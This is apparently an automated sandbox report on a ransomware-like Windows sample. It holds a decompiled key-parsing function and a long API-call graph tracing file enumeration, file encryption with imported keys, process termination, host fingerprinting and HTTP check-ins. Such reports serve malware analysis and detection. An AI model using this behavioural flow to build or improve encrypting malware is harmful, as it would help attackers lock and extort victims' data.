                                        Function 0F9D3190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D3190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}






                                        0x0f9d3193
                                        0x0f9d3197
                                        0x0f9d319c
                                        0x0f9d31b0
                                        0x0f9d31b9
                                        0x0f9d31ce
                                        0x0f9d31d1
                                        0x0f9d31d9
                                        0x0f9d31e1
                                        0x0f9d31e4
                                        0x0f9d31e9
                                        0x0f9d31a0
                                        0x0f9d31a0
                                        0x0f9d31a0
                                        0x0f9d31a4
                                        0x00000000
                                        0x00000000
                                        0x0f9d31a8
                                        0x0f9d31ec
                                        0x00000000
                                        0x0f9d31aa
                                        0x0f9d31aa
                                        0x0f9d31ae
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d31ae
                                        0x00000000
                                        0x0f9d31a8
                                        0x0f9d31f5
                                        0x0f9d31f5
                                        0x00000000

                                        APIs
                                        • lstrcmpiA.KERNEL32(0F9D52F0,mask,0F9D52F1,?,?,0F9D3441,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D31B9
                                        • lstrcmpiA.KERNEL32(0F9D52F0,pub_key,?,0F9D3441,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D31D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi
                                        • String ID: mask$pub_key
                                        • API String ID: 1586166983-1355590148
                                        • Opcode ID: dc83947407bc56870ee006937442ba29ab4ce0eb6c6c6e77889f462621b3af5e
                                        • Instruction ID: e71e890305bd38e5069b66116b8f61ade97e9b1cfc5e01979753ba9f99c97e9f
                                        • Opcode Fuzzy Hash: dc83947407bc56870ee006937442ba29ab4ce0eb6c6c6e77889f462621b3af5e
                                        • Instruction Fuzzy Hash: 33F046723082861EF7354E68DC45BA1BBCC9B42312FB4847EF78AC21C2C2AA9881C351
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:5.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:700
                                        Total number of Limit Nodes:10
                                        execution_graph 2339 f9d6d09 2340 f9d6d10 lstrcmpW 2339->2340 2341 f9d6d2a lstrcmpW 2340->2341 2342 f9d6db3 FindNextFileW 2340->2342 2341->2342 2344 f9d6d40 lstrcatW 2341->2344 2342->2340 2343 f9d6dcb FindClose 2342->2343 2345 f9d6dd4 2343->2345 2346 f9d6d53 lstrcatW 2344->2346 2349 f9d6d6c 2344->2349 2350 f9d6c90 2346->2350 2349->2342 2369 f9d6950 VirtualAlloc wsprintfW 2349->2369 2377 f9d6640 VirtualAlloc 2350->2377 2352 f9d6ca6 2353 f9d6dd4 2352->2353 2389 f9d6a40 lstrlenW lstrcatW FindFirstFileW 2352->2389 2353->2349 2355 f9d6cb5 2355->2353 2404 f9d6be0 VirtualAlloc wsprintfW CreateFileW 2355->2404 2357 f9d6cc2 lstrlenW lstrcatW FindFirstFileW 2358 f9d6cf8 2357->2358 2359 f9d6d04 2357->2359 2358->2349 2360 f9d6d10 lstrcmpW 2359->2360 2361 f9d6d2a lstrcmpW 2360->2361 2362 f9d6db3 FindNextFileW 2360->2362 2361->2362 2364 f9d6d40 lstrcatW 2361->2364 2362->2360 2363 f9d6dcb FindClose 2362->2363 2363->2353 2365 f9d6d53 lstrcatW 2364->2365 2368 f9d6d6c 2364->2368 2366 f9d6c90 102 API calls 2365->2366 2366->2368 2367 f9d6950 69 API calls 2367->2368 2368->2362 2368->2367 2412 f9d6850 2369->2412 2371 f9d69a7 VirtualFree 2371->2349 2372 f9d698a 2372->2371 2420 f9d6790 lstrlenW lstrlenW 2372->2420 2375 f9d69a3 2375->2371 2432 f9d35e0 GetFileAttributesW SetFileAttributesW 2375->2432 2379 f9d6667 2377->2379 2378 f9d676c VirtualFree 2378->2352 2379->2378 2380 f9d66e7 SHGetSpecialFolderPathW 2379->2380 2381 f9d66f8 2380->2381 2382 f9d6705 SHGetSpecialFolderPathW 2380->2382 2381->2378 2381->2382 2383 f9d671f SHGetSpecialFolderPathW 2382->2383 2384 f9d6712 2382->2384 2385 f9d672c 2383->2385 2386 f9d6739 SHGetSpecialFolderPathW 2383->2386 2384->2378 2384->2383 2385->2378 2385->2386 2387 f9d6746 2386->2387 2388 f9d6753 VirtualFree 2386->2388 2387->2378 2387->2388 2388->2352 2390 f9d6a90 lstrcmpW 2389->2390 2391 f9d6aa6 lstrcmpW 2390->2391 2392 f9d6bb2 FindNextFileW 2390->2392 2391->2392 2394 f9d6abc lstrcatW lstrlenW 2391->2394 2392->2390 2393 f9d6bca FindClose 2392->2393 2393->2355 2395 f9d6adf 2394->2395 2395->2392 2396 f9d6af4 lstrcmpW 2395->2396 2399 f9d6b92 CloseHandle 2395->2399 2401 f9d6b81 VirtualFree 2395->2401 2402 f9d6b69 lstrlenA 2395->2402 2396->2395 2397 f9d6b04 CreateFileW GetFileSize 2396->2397 2398 f9d6b31 VirtualAlloc 2397->2398 2397->2399 2398->2395 2400 f9d6b46 ReadFile 2398->2400 2399->2393 2399->2395 2400->2395 2400->2401 2401->2395 2410 f9d69e0 lstrlenA 2402->2410 2405 f9d6c2c GetLastError 2404->2405 2406 f9d6c3e 2404->2406 2407 f9d6c70 VirtualFree 2405->2407 2408 f9d6c64 CloseHandle 2406->2408 2409 f9d6c47 lstrlenW WriteFile 2406->2409 2407->2357 2408->2407 2409->2408 2411 f9d69fa 2410->2411 2411->2395 2413 f9d686a lstrlenW 2412->2413 2414 f9d6860 2412->2414 2415 f9d6890 2413->2415 2416 f9d687e 2413->2416 2414->2372 2415->2372 2416->2415 2417 f9d689b lstrlenW VirtualAlloc wsprintfW 2416->2417 2419 f9d68d8 VirtualFree 2417->2419 2419->2372 2421 f9d67be lstrcmpiW 2420->2421 2424 f9d67ac 2420->2424 2422 f9d67dc lstrcmpiW 2421->2422 2423 f9d67d3 2421->2423 2422->2423 2425 f9d67e8 lstrcmpiW 2422->2425 2423->2375 2424->2421 2425->2423 2426 f9d67f4 lstrcmpiW 2425->2426 2426->2423 2427 f9d6800 lstrcmpiW 2426->2427 2427->2423 2428 f9d680c lstrcmpiW 2427->2428 2428->2423 2429 f9d6818 lstrcmpiW 2428->2429 2429->2423 2430 f9d6824 lstrcmpiW 2429->2430 2430->2423 2431 f9d6830 lstrcmpiW 2430->2431 2431->2375 2462 f9d63d0 2432->2462 2435 f9d82a0 9 API calls 2436 f9d36a5 2435->2436 2437 f9d82a0 9 API calls 2436->2437 2438 f9d36b5 VirtualAlloc VirtualAlloc 2437->2438 2464 f9d6530 EnterCriticalSection CryptAcquireContextW 2438->2464 2441 f9d372b MessageBoxA 2443 f9d39d8 VirtualFree 2441->2443 2442 f9d3757 2444 f9d6530 10 API calls 2442->2444 2443->2371 2445 f9d376c 2444->2445 2446 f9d3773 GetLastError 2445->2446 2447 f9d3792 2445->2447 2446->2443 2448 f9d37a5 CreateFileW 2447->2448 2449 f9d37cd VirtualFree VirtualFree 2448->2449 2450 f9d37fc VirtualAlloc VirtualAlloc 2448->2450 2449->2443 2451 f9d3835 ReadFile 2450->2451 2452 f9d3940 VirtualFree 2451->2452 2460 f9d3832 _memmove 2451->2460 2453 f9d3958 WriteFile WriteFile WriteFile 2452->2453 2454 f9d3992 CloseHandle VirtualFree VirtualFree VirtualFree 2452->2454 2453->2454 2455 f9d39c9 MoveFileW 2454->2455 2456 f9d39d5 2454->2456 2455->2456 2456->2443 2457 f9d3888 VirtualAlloc 2457->2460 2458 f9d38a7 VirtualAlloc 2459 f9d38e5 VirtualFree SetFilePointer WriteFile 2458->2459 2458->2460 2459->2460 2461 f9d3927 VirtualFree 2459->2461 2460->2451 2460->2452 2460->2457 2460->2458 2460->2459 2460->2461 2461->2452 2461->2460 2463 f9d3626 VirtualAlloc lstrcpyW lstrcatW 2462->2463 2463->2435 2465 f9d659e CryptImportKey 2464->2465 2466 f9d6568 GetLastError 2464->2466 2468 f9d65c3 CryptGetKeyParam CryptEncrypt GetLastError 2465->2468 2469 f9d6622 CryptReleaseContext LeaveCriticalSection 2465->2469 2467 f9d6575 CryptAcquireContextW 2466->2467 2470 f9d3724 2466->2470 2467->2470 2471 f9d6595 2467->2471 2468->2469 2472 f9d661a 2468->2472 2469->2470 2470->2441 2470->2442 2471->2465 2472->2469 2473 f9d48a8 2474 f9d48b0 lstrcmpiW 2473->2474 2475 f9d48bf OpenProcess 2474->2475 2476 f9d48a4 2474->2476 2475->2476 2477 f9d48d1 TerminateProcess CloseHandle 2475->2477 2476->2474 2478 f9d48f4 Process32NextW 2476->2478 2477->2476 2478->2476 2479 f9d4907 2478->2479 2480 f9d4919 CloseHandle 2479->2480 2481 f9d490b VirtualFree 2479->2481 2481->2480 2210 f9d4bd5 2213 f9d64f0 VirtualFree VirtualFree 2210->2213 2212 f9d4be4 2213->2212 2214 f9d41d6 2222 f9d41e0 2214->2222 2215 f9d4286 2216 f9d43a8 VirtualFree 2215->2216 2217 f9d4377 VirtualAlloc 2215->2217 2220 f9d7c10 10 API calls 2216->2220 2217->2216 2219 f9d4394 wsprintfW 2217->2219 2218 f9d4210 lstrcpyW lstrlenW 2218->2215 2218->2222 2219->2216 2221 f9d43c8 2220->2221 2222->2215 2222->2218 1682 f9d4bf0 1683 f9d4c0d CreateThread 1682->1683 1684 f9d4c2b FindCloseChangeNotification 1683->1684 1685 f9d4c35 1683->1685 1686 f9d4950 Sleep 1683->1686 1684->1685 1731 f9d4600 1686->1731 1689 f9d496a ExitProcess 1690 f9d4972 CreateThread 1691 f9d49bc 1690->1691 1692 f9d4990 WaitForSingleObject 1690->1692 1747 f9d46f0 CreateToolhelp32Snapshot VirtualAlloc 1691->1747 1693 f9d49a6 TerminateThread 1692->1693 1694 f9d49b2 CloseHandle 1692->1694 1693->1694 1694->1691 1696 f9d49c1 1758 f9d40e0 1696->1758 1700 f9d49ce 1701 f9d4a1c VirtualAlloc 1700->1701 1708 f9d4a6b 1700->1708 1703 f9d4a39 GetModuleFileNameW 1701->1703 1704 f9d4a63 ExitProcess 1701->1704 1702 f9d4aa5 1710 f9d4b18 1702->1710 1711 f9d4acf lstrlenA VirtualAlloc CryptStringToBinaryA 1702->1711 1781 f9d3be0 1703->1781 1708->1702 1709 f9d4a8f Sleep 1708->1709 1792 f9d5880 1708->1792 1709->1708 1836 f9d4030 1710->1836 1711->1710 1713 f9d4b10 ExitProcess 1711->1713 1714 f9d4b24 InitializeCriticalSection 1715 f9d4b35 1714->1715 1716 f9d4b42 1714->1716 1839 f9d4000 1715->1839 1845 f9d3e20 VirtualAlloc GetTickCount 1716->1845 1720 f9d4b4a DeleteCriticalSection 1853 f9d3aa0 AllocateAndInitializeSid 1720->1853 1722 f9d4b5a 1723 f9d4b63 VirtualAlloc 1722->1723 1857 f9d43e0 1722->1857 1725 f9d4baa 1723->1725 1726 f9d4b80 GetModuleFileNameW 1723->1726 1727 f9d4bcd ExitThread 1725->1727 1728 f9d4bb3 ShellExecuteW 1725->1728 1729 f9d3be0 17 API calls 1726->1729 1728->1727 1730 f9d4b99 VirtualFree 1729->1730 1730->1725 1864 f9d39f0 GetProcessHeap 1731->1864 1733 f9d4637 1865 f9d7330 1733->1865 1737 f9d4649 VirtualAlloc 1738 f9d4668 lstrcpyW lstrlenW 1737->1738 1951 f9d6f40 1738->1951 1741 f9d4699 CreateMutexW GetLastError 1742 f9d46ba VirtualFree 1741->1742 1743 f9d46b1 GetLastError 1741->1743 1977 f9d7c10 1742->1977 1743->1742 1748 f9d4888 1747->1748 1752 f9d489b 1747->1752 1749 f9d4893 Process32FirstW 1748->1749 1748->1752 1749->1752 1750 f9d48b0 lstrcmpiW 1751 f9d48bf OpenProcess 1750->1751 1750->1752 1751->1752 1753 f9d48d1 TerminateProcess CloseHandle 1751->1753 1752->1750 1754 f9d48f4 Process32NextW 1752->1754 1753->1752 1754->1752 1755 f9d4907 1754->1755 1756 f9d4919 CloseHandle 1755->1756 1757 f9d490b VirtualFree 1755->1757 1756->1696 1757->1756 1759 f9d43c8 1758->1759 1760 f9d40fb 1758->1760 1778 f9d6420 VirtualAlloc VirtualAlloc 1759->1778 2049 f9d39f0 GetProcessHeap 1760->2049 1762 f9d4126 1763 f9d7330 98 API calls 1762->1763 1764 f9d4132 1763->1764 1765 f9d7140 16 API calls 1764->1765 1766 f9d413e VirtualAlloc 1765->1766 1767 f9d4162 1766->1767 1768 f9d6f40 49 API calls 1767->1768 1769 f9d4180 1768->1769 1770 f9d418c lstrlenW 1769->1770 1777 f9d41c0 1770->1777 1771 f9d4286 1772 f9d43a8 VirtualFree 1771->1772 1773 f9d4377 VirtualAlloc 1771->1773 1776 f9d7c10 10 API calls 1772->1776 1773->1772 1775 f9d4394 wsprintfW 1773->1775 1774 f9d4210 lstrcpyW lstrlenW 1774->1771 1774->1777 1775->1772 1776->1759 1777->1771 1777->1774 2050 f9d62b0 CryptAcquireContextW 1778->2050 2058 f9d3b20 1781->2058 1783 f9d3bf6 1784 f9d3dfa VirtualFree 1783->1784 1785 f9d3aa0 4 API calls 1783->1785 1784->1704 1786 f9d3c03 1785->1786 1786->1784 1787 f9d3c0b ExpandEnvironmentStringsW wsprintfW VirtualAlloc GetForegroundWindow 1786->1787 1788 f9d3de0 ShellExecuteExW 1787->1788 1789 f9d3de7 1788->1789 1790 f9d3e01 WaitForSingleObject CloseHandle ExitProcess 1788->1790 1789->1788 1791 f9d3ded VirtualFree 1789->1791 1791->1784 2063 f9d39f0 GetProcessHeap 1792->2063 1794 f9d58c4 1795 f9d7330 98 API calls 1794->1795 1796 f9d58cd 1795->1796 1797 f9d7140 16 API calls 1796->1797 1798 f9d58d6 VirtualAlloc 1797->1798 1799 f9d590e 1798->1799 1800 f9d597b 6 API calls 1799->1800 1801 f9d5d44 1799->1801 1802 f9d59fa lstrlenA 1800->1802 1804 f9d5d4f VirtualFree 1801->1804 1805 f9d5a22 lstrlenA 1802->1805 1806 f9d7c10 10 API calls 1804->1806 1809 f9d5a72 lstrlenA 1805->1809 1815 f9d5a3e lstrlenA 1805->1815 1808 f9d5d65 1806->1808 1808->1708 1810 f9d5aa1 lstrcatW lstrlenW 1809->1810 1817 f9d5a7b lstrlenA 1809->1817 1811 f9d6f40 49 API calls 1810->1811 1814 f9d5ac9 12 API calls 1811->1814 1818 f9d5b6a lstrlenW 1814->1818 1816 f9d5a6e 1815->1816 1816->1809 1817->1810 1820 f9d9010 _memset 1818->1820 1821 f9d5bcc lstrlenA 1820->1821 1822 f9d5bed 1821->1822 1823 f9d5c04 CryptBinaryToStringA 1822->1823 1824 f9d5c36 lstrlenA VirtualAlloc lstrlenA 1823->1824 1825 f9d5c30 GetLastError 1823->1825 1826 f9d5c5e lstrlenA 1824->1826 1825->1824 1828 f9d5c9e lstrlenA MultiByteToWideChar 1826->1828 1829 f9d5c77 lstrlenA 1826->1829 2064 f9d54a0 1828->2064 1829->1828 1833 f9d5d07 VirtualFree VirtualFree VirtualFree 1833->1801 1834 f9d5cd6 VirtualFree VirtualFree VirtualFree 1834->1804 1837 f9d403d VirtualAlloc 1836->1837 1838 f9d4058 1836->1838 1837->1838 1838->1714 1838->1838 1840 f9d4014 1839->1840 1841 f9d3e20 276 API calls 1840->1841 1842 f9d401c 1841->1842 2182 f9d64f0 VirtualFree VirtualFree 1842->2182 1844 f9d4024 1844->1720 1846 f9d3e80 GetDriveTypeW 1845->1846 1847 f9d3e95 1846->1847 1847->1846 1848 f9d3e9a CreateThread 1847->1848 1849 f9d3ede WaitForMultipleObjects GetTickCount 1847->1849 1848->1847 1850 f9d3f3f 1849->1850 2183 f9d5670 VirtualAlloc 1850->2183 1852 f9d3fed 1852->1720 1854 f9d3ade GetModuleHandleA GetProcAddress 1853->1854 1855 f9d3ada 1853->1855 1856 f9d3b00 FreeSid 1854->1856 1855->1722 1856->1722 1858 f9d3b20 4 API calls 1857->1858 1859 f9d43f4 VirtualAlloc 1858->1859 1861 f9d45af GetSystemDirectoryW lstrcatW ShellExecuteW 1859->1861 1862 f9d45ab 1859->1862 1863 f9d45df VirtualFree 1861->1863 1862->1863 1863->1723 1864->1733 1866 f9d736e 1865->1866 1867 f9d7349 VirtualAlloc GetUserNameW 1865->1867 1868 f9d7374 VirtualAlloc GetComputerNameW 1866->1868 1869 f9d7396 1866->1869 1867->1866 1868->1869 1870 f9d73f6 1869->1870 1871 f9d73a2 VirtualAlloc 1869->1871 1872 f9d7495 1870->1872 1873 f9d7400 VirtualAlloc RegOpenKeyExW 1870->1873 1871->1870 1874 f9d73b9 1871->1874 1877 f9d749f VirtualAlloc VirtualAlloc 1872->1877 1878 f9d7599 1872->1878 1875 f9d743c RegQueryValueExW 1873->1875 1876 f9d747e VirtualFree 1873->1876 1998 f9d72b0 RegOpenKeyExW 1874->1998 1880 f9d7469 GetLastError 1875->1880 1881 f9d7460 1875->1881 1876->1872 1884 f9d74d4 wsprintfW RegOpenKeyExW 1877->1884 1882 f9d759f VirtualAlloc 1878->1882 1883 f9d75fb 1878->1883 1885 f9d746f RegCloseKey 1880->1885 1881->1885 1886 f9d72b0 5 API calls 1882->1886 1888 f9d766e 1883->1888 1889 f9d7601 GetNativeSystemInfo VirtualAlloc 1883->1889 1887 f9d7509 RegQueryValueExW 1884->1887 1895 f9d752b 1884->1895 1885->1872 1885->1876 1894 f9d75cd 1886->1894 1887->1895 1896 f9d7534 GetLastError 1887->1896 1892 f9d768f 1888->1892 1893 f9d7674 1888->1893 1897 f9d7624 1889->1897 1898 f9d7647 wsprintfW 1889->1898 1890 f9d73d4 1890->1870 1891 f9d73f1 wsprintfW 1890->1891 1891->1870 1902 f9d77d9 1892->1902 1903 f9d7699 VirtualAlloc VirtualAlloc GetWindowsDirectoryW GetVolumeInformationW 1892->1903 2003 f9d7a10 VirtualAlloc VirtualAlloc 1893->2003 1894->1883 1906 f9d72b0 5 API calls 1894->1906 1895->1884 1899 f9d7576 wsprintfW VirtualFree 1895->1899 1904 f9d753a RegCloseKey 1895->1904 1896->1904 1897->1898 1905 f9d7632 wsprintfW ExitProcess 1897->1905 1898->1888 1899->1878 1910 f9d77e9 VirtualAlloc 1902->1910 1911 f9d7992 1902->1911 1908 f9d72b0 5 API calls 1903->1908 1904->1895 1909 f9d7549 lstrcmpiW 1904->1909 1912 f9d75ee wsprintfW 1906->1912 1907 f9d7688 1907->1892 1913 f9d7725 1908->1913 1909->1895 1909->1905 1931 f9d7840 1910->1931 1914 f9d799b VirtualAlloc 1911->1914 1915 f9d4640 1911->1915 1912->1883 1916 f9d7729 lstrlenW 1913->1916 1917 f9d775a wsprintfW lstrcatW GetModuleHandleW GetProcAddress 1913->1917 1921 f9d79b9 1914->1921 1922 f9d79d6 1914->1922 1933 f9d7140 1915->1933 1918 f9d72b0 5 API calls 1916->1918 1919 f9d779d lstrlenW 1917->1919 1920 f9d77b4 VirtualFree 1917->1920 1918->1917 1919->1920 1920->1902 2021 f9d6e90 1921->2021 1922->1915 1924 f9d7862 GetDriveTypeW 1924->1931 1927 f9d7889 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 1930 f9d7963 lstrcatW 1927->1930 1927->1931 1928 f9d79c4 VirtualFree 1928->1922 1929 f9d7983 lstrlenW 1929->1911 1930->1931 1931->1924 1931->1927 1931->1929 1932 f9d78fc lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 1931->1932 1932->1931 1934 f9d7150 1933->1934 1935 f9d718f lstrlenW lstrlenW 1934->1935 1936 f9d71aa 1934->1936 1935->1936 1937 f9d71cb 1936->1937 1938 f9d71b0 lstrlenW lstrlenW 1936->1938 1939 f9d71ec 1937->1939 1940 f9d71d1 lstrlenW lstrlenW 1937->1940 1938->1937 1941 f9d720d 1939->1941 1942 f9d71f2 lstrlenW lstrlenW 1939->1942 1940->1939 1943 f9d722e 1941->1943 1944 f9d7213 lstrlenW lstrlenW 1941->1944 1942->1941 1945 f9d724f 1943->1945 1946 f9d7234 lstrlenW lstrlenW 1943->1946 1944->1943 1947 f9d725e lstrlenW lstrlenW 1945->1947 1948 f9d7279 1945->1948 1946->1945 1947->1948 1949 f9d72a7 1948->1949 1950 f9d7282 lstrlenW lstrlenW 1948->1950 1949->1737 1950->1737 1952 f9d6f7c 1951->1952 1953 f9d6f5a lstrcatW lstrcatW lstrcatW lstrcatW 1951->1953 1954 f9d6f9d 1952->1954 1955 f9d6f81 lstrcatW lstrcatW lstrcatW lstrcatW 1952->1955 1953->1952 1956 f9d6fbf 1954->1956 1957 f9d6fa3 lstrcatW lstrcatW lstrcatW lstrcatW 1954->1957 1955->1954 1958 f9d6fc5 lstrcatW lstrcatW lstrcatW lstrcatW 1956->1958 1959 f9d6fe1 1956->1959 1957->1956 1958->1959 1960 f9d6fe7 lstrcatW lstrcatW lstrcatW lstrcatW 1959->1960 1961 f9d7003 1959->1961 1960->1961 1962 f9d7009 lstrcatW lstrcatW lstrcatW lstrcatW 1961->1962 1963 f9d7025 1961->1963 1962->1963 1964 f9d702b lstrcatW lstrcatW lstrcatW lstrcatW 1963->1964 1965 f9d7047 1963->1965 1964->1965 1966 f9d704d lstrcatW lstrcatW lstrcatW lstrcatW 1965->1966 1967 f9d7069 1965->1967 1966->1967 1968 f9d706f lstrcatW lstrcatW lstrcatW lstrcatW 1967->1968 1969 f9d708b 1967->1969 1968->1969 1970 f9d70fc 1969->1970 1971 f9d7091 VirtualAlloc 1969->1971 1974 f9d711e lstrlenW 1970->1974 1975 f9d7102 lstrcatW lstrcatW lstrcatW lstrcatW 1970->1975 1972 f9d70ac wsprintfW 1971->1972 1973 f9d70c1 wsprintfW 1971->1973 1976 f9d70d0 lstrcatW lstrcatW lstrcatW lstrcatW VirtualFree 1972->1976 1973->1976 1974->1741 1975->1974 1976->1970 1978 f9d7c1f VirtualFree 1977->1978 1979 f9d7c2b 1977->1979 1978->1979 1980 f9d7c3d 1979->1980 1981 f9d7c31 VirtualFree 1979->1981 1982 f9d7c4f 1980->1982 1983 f9d7c43 VirtualFree 1980->1983 1981->1980 1984 f9d7c55 VirtualFree 1982->1984 1985 f9d7c61 1982->1985 1983->1982 1984->1985 1986 f9d7c67 VirtualFree 1985->1986 1987 f9d7c73 1985->1987 1986->1987 1988 f9d7c79 VirtualFree 1987->1988 1989 f9d7c85 1987->1989 1988->1989 1990 f9d7c8b VirtualFree 1989->1990 1991 f9d7c97 1989->1991 1990->1991 1992 f9d7c9d VirtualFree 1991->1992 1993 f9d7ca9 1991->1993 1992->1993 1994 f9d7caf VirtualFree 1993->1994 1995 f9d7cbb 1993->1995 1994->1995 1996 f9d7cc4 VirtualFree 1995->1996 1997 f9d46da 1995->1997 1996->1997 1997->1689 1997->1690 1999 f9d731e 1998->1999 2000 f9d72d2 RegQueryValueExW 1998->2000 1999->1890 2001 f9d7306 GetLastError RegCloseKey 2000->2001 2002 f9d72f1 RegCloseKey 2000->2002 2001->1890 2002->1890 2004 f9d7aac CreateToolhelp32Snapshot 2003->2004 2005 f9d7ad2 2003->2005 2006 f9d7add Process32FirstW 2004->2006 2007 f9d7ac4 VirtualFree 2004->2007 2005->1907 2008 f9d7bcd VirtualFree CloseHandle 2006->2008 2015 f9d7afd 2006->2015 2007->2005 2009 f9d7bed VirtualFree 2008->2009 2010 f9d7bf7 2008->2010 2009->2010 2010->1907 2011 f9d7ba7 2013 f9d7bc5 2011->2013 2014 f9d7bb5 lstrlenW 2011->2014 2012 f9d7b10 lstrcmpiW 2012->2015 2013->2008 2014->2013 2015->2011 2015->2012 2016 f9d7b4f lstrcatW lstrcatW 2015->2016 2017 f9d7b3a lstrcpyW lstrcatW 2015->2017 2018 f9d7b87 Process32NextW 2015->2018 2019 f9d7b60 lstrlenW 2016->2019 2017->2019 2018->2011 2020 f9d7b98 GetLastError 2018->2020 2019->2018 2020->2011 2020->2015 2031 f9d7ce0 InternetOpenW 2021->2031 2025 f9d6ee6 2026 f9d6eea lstrlenA 2025->2026 2027 f9d6f11 VirtualFree 2025->2027 2026->2027 2028 f9d6efa wsprintfW 2026->2028 2029 f9d6f2d 2027->2029 2030 f9d6f26 InternetCloseHandle 2027->2030 2028->2027 2029->1915 2029->1928 2030->2029 2032 f9d7ecd InternetOpenW 2031->2032 2033 f9d6ea2 VirtualAlloc lstrlenW 2031->2033 2032->2033 2034 f9d7ef0 2033->2034 2035 f9d7f09 2034->2035 2036 f9d7f02 InternetCloseHandle 2034->2036 2037 f9d7ce0 2 API calls 2035->2037 2036->2035 2038 f9d7f10 InternetConnectW 2037->2038 2039 f9d7f38 2038->2039 2040 f9d7f41 VirtualAlloc wsprintfW HttpOpenRequestW 2038->2040 2039->2025 2041 f9d7f91 HttpAddRequestHeadersW 2040->2041 2042 f9d8062 InternetCloseHandle InternetCloseHandle VirtualFree 2040->2042 2041->2042 2043 f9d7ff8 HttpSendRequestW 2041->2043 2042->2025 2044 f9d805c GetLastError 2043->2044 2045 f9d800f InternetReadFile 2043->2045 2044->2042 2045->2042 2046 f9d802e 2045->2046 2046->2042 2047 f9d8037 InternetReadFile 2046->2047 2047->2046 2048 f9d805a 2047->2048 2048->2042 2049->1762 2051 f9d62cf GetLastError 2050->2051 2052 f9d6305 CryptGenKey 2050->2052 2055 f9d62dc CryptAcquireContextW 2051->2055 2056 f9d62f5 2051->2056 2053 f9d6321 2052->2053 2054 f9d6322 CryptExportKey CryptExportKey CryptDestroyKey CryptReleaseContext CryptAcquireContextW 2052->2054 2053->2054 2054->2056 2055->2056 2057 f9d62fc 2055->2057 2056->1700 2057->2052 2061 f9d9010 2058->2061 2062 f9d3b77 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 2061->2062 2062->1783 2063->1794 2065 f9d7ce0 2 API calls 2064->2065 2066 f9d54bc 2065->2066 2082 f9d5060 VirtualAlloc 2066->2082 2069 f9d5503 lstrcatA lstrcatA lstrlenA 2071 f9d9010 _memset 2069->2071 2072 f9d5592 lstrcpyW 2071->2072 2091 f9d53a0 VirtualAlloc GetModuleFileNameW CreateFileW 2072->2091 2074 f9d55b2 lstrlenW lstrlenA 2075 f9d7ef0 15 API calls 2074->2075 2076 f9d55f4 2075->2076 2077 f9d5628 VirtualFree VirtualFree VirtualFree 2076->2077 2101 f9d5210 lstrlenA VirtualAlloc 2076->2101 2078 f9d565e 2077->2078 2079 f9d5657 InternetCloseHandle 2077->2079 2078->1833 2078->1834 2079->2078 2081 f9d5614 2081->2077 2083 f9d517f lstrlenA VirtualAlloc VirtualAlloc 2082->2083 2084 f9d50d9 2082->2084 2083->2069 2085 f9d50fe Sleep 2084->2085 2086 f9d5109 lstrlenW VirtualAlloc 2084->2086 2085->2086 2122 f9d4e90 CreatePipe 2086->2122 2088 f9d5134 lstrcmpiA 2089 f9d515c wsprintfW VirtualFree 2088->2089 2090 f9d5147 VirtualFree 2088->2090 2089->2083 2090->2084 2092 f9d53f9 CreateFileMappingW 2091->2092 2093 f9d5487 VirtualFree 2091->2093 2094 f9d5411 MapViewOfFile 2092->2094 2095 f9d5480 CloseHandle 2092->2095 2093->2074 2096 f9d5477 CloseHandle 2094->2096 2097 f9d5427 lstrlenW lstrlenA 2094->2097 2095->2093 2096->2095 2098 f9d5468 UnmapViewOfFile 2097->2098 2099 f9d5444 lstrlenA 2097->2099 2098->2096 2099->2098 2102 f9d5246 CryptStringToBinaryA 2101->2102 2104 f9d526c _memset 2102->2104 2105 f9d5385 GetLastError 2102->2105 2107 f9d52b0 lstrlenA 2104->2107 2106 f9d536c VirtualFree 2105->2106 2106->2081 2108 f9d52ce 2107->2108 2151 f9d33e0 2108->2151 2111 f9d538d 2161 f9d5190 VirtualAlloc VirtualAlloc 2111->2161 2112 f9d52fa 2114 f9d531c lstrlenA VirtualAlloc 2112->2114 2118 f9d5341 2112->2118 2116 f9d5339 lstrcpyA 2114->2116 2114->2118 2116->2118 2117 f9d535d 2119 f9d5369 2117->2119 2121 f9d5366 HeapFree 2117->2121 2118->2117 2120 f9d5355 HeapFree 2118->2120 2119->2106 2120->2117 2121->2119 2123 f9d4fbd SetHandleInformation 2122->2123 2124 f9d4fb3 